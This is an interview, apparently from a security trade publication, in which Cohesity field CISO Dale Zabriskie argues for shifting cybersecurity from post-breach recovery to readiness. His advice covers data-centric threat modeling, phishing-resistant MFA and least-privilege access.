Beyond the breach: Why cybersecurity must shift from recovery to readiness

PORTLAND, Ore. — The rules for cybersecurity are changing at an alarming rate – so fast that it’s time to throw out the old security playbook and write a new one, according to Dale “Dr. Z” Zabriskie, field CISO at Cohesity. 

With decades of experience as a security consultant and tech evangelist, Zabriskie argues that modern cybersecurity should be moving away from the practice of post-breach recovery and focus on real-time damage mitigation. SSN spoke with Zabriskie to learn more about the evolving threat landscape and why established cybersecurity practices need to change to have a place in it. 

SSN: You’ve argued that traditional metrics like Recovery Time Objectives (RTOs) are no longer relevant during active breaches. What should security teams prioritize instead when every second counts during an attack? 

Zabriskie: Both RTOs and recovery point objectives (RPOs) focus on “technical recovery,” but cyberattacks aren’t limited to just technical areas of an organization – they affect the entire business, impacting reputation and customer trust. Additionally, when attacks take place, data integrity is often compromised, rendering the backups unusable, thereby delaying restoration. 

Security and infrastructure teams need to plan and practice together to ensure they’re ready when the attack strikes. Building strategies for responding to and recovering from cyberattacks shouldn’t be limited to IT and security teams; involvement from legal, PR, compliance and forensic response teams is essential. These parties need to align on what their “minimum viable company” is: If a catastrophic event shuts everything down, what systems would they bring up first? What data, servers, processes, departments, people, etc., does that include? Traditionally, budgets have been based on economic efficiency during “normal times” as opposed to “What will it take for us to be back up and running should an attack occur?” 

Security teams need to prioritize getting everyone at the organization on the same page because when the attack occurs, it’s critical to ensure everyone is able to respond and not react.  

SSN: You’ve said the term “ransomware” is outdated. How should security leaders shift their threat models to account for attacks that bypass malware entirely, such as pure extortion or data exfiltration? 

Zabriskie: I argue that in today’s threat ecosystem, the term “ransomware” is misleading and archaic. Today’s cyberattacks, whether they come with a ransom or not, require an evolving defensive approach. Teams need to shift their focus to data-centric threat modeling, concentrating on data lifecycle and movement and, maybe most importantly, treating their data like it is currency – putting the right controls on the right data. Avoid under- and over-protecting data.  

By modeling threats that specifically target the “crown jewels” (data), teams can use Zero Trust, Immutability, Air Gapped protection, and other approaches to ensure they stay ahead of attackers. Additionally, security leaders should use behavioral analytics to help identify potential “living off the land” techniques (aka when cybercriminals use native, legitimate tools within an organization’s own system to sustain and advance an attack). 

SSN: Given that social engineering has eclipsed malware as the leading attack vector, what immediate changes should organizations make to better secure identities and reduce behavioral vulnerabilities? 

Zabriskie: First and foremost, turning the “human” into an asset instead of a liability is an ongoing challenge for any organization. Fostering a security-first culture means employees are trained and engaged in the fight against cybercrime. Employees need to feel empowered to report incidents without fear and receive recognition and rewards for proper, proactive security behavior.  

Second, identity access management needs to include phishing-resistant MFA, moving away from SMS and OTP processes. I always ask customers, “How many folks do you have with super administrative privileges to systems?” Then I give them the answer: “Two too many.” Organizations need to regularly reassess access levels and require ongoing justification for each access grant, focusing on the least privileged and just-in-time access. Again, Zero Trust principles are at play here: Security leaders need to continuously verify every access request, look for lateral movement and session hijacking.